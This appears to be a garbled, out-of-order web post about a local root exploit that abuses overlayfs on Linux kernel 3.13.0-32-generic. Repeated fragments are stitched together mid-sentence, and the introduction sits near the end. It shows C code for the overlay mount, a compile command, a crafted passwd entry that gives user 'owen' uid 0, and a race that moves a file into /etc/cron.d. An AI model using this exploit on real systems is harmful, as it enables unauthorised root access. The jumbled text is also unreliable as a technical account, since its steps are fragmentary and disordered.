Linux 3.13.0-32-generic Exploit -

char *lower = "/tmp/lower"; char *upper = "/tmp/upper"; char *work = "/tmp/work"; char *merged = "/tmp/merged"; mkdir(lower, 0777); mkdir(upper, 0777); mkdir(work, 0777); mkdir(merged, 0777); Inside the lower directory, the exploit creates a dummy file that it will later try to replace.

# Compile the exploit gcc overlayfs.c -o exploit -lpthread id uid=1001(bob) gid=1001(bob) groups=1001(bob) linux 3.13.0-32-generic exploit

For penetration testers: Enjoy the easy win, but document it thoroughly. A root shell via a 9-year-old bug is a clear sign of a broken patch management policy. char *lower = "/tmp/lower"; char *upper = "/tmp/upper";

owen:$6$salt$hash:0:0:root:/root:/bin/bash After a successful exploit, the attacker runs su owen (no password needed depending on the crafted hash) and becomes root. Disclaimer: Only run this on systems you own or have explicit written permission to test. char *lower = "/tmp/lower"

Posted by: Security Research Team Date: October 26, 2023 (Updated) Difficulty: Advanced Introduction If you have been in the cybersecurity space for a while, you have likely stumbled upon a vulnerability report or an exploit script mentioning a specific kernel string: linux 3.13.0-32-generic .

char opts[256]; snprintf(opts, sizeof(opts), "lowerdir=%s,upperdir=%s,workdir=%s", lower, upper, work); mount("overlay", merged, "overlayfs", 0, opts); Now, inside /tmp/merged , the file file appears. If you edit it, the changes actually go to /tmp/upper/file . This is where the exploit deviates from normal behavior. The attacker creates a second thread. Thread A tries to rename the file from the overlay to a protected location (e.g., /etc/cron.d/exploit ). Thread B constantly churns the filesystem by creating and deleting files in the upper directory.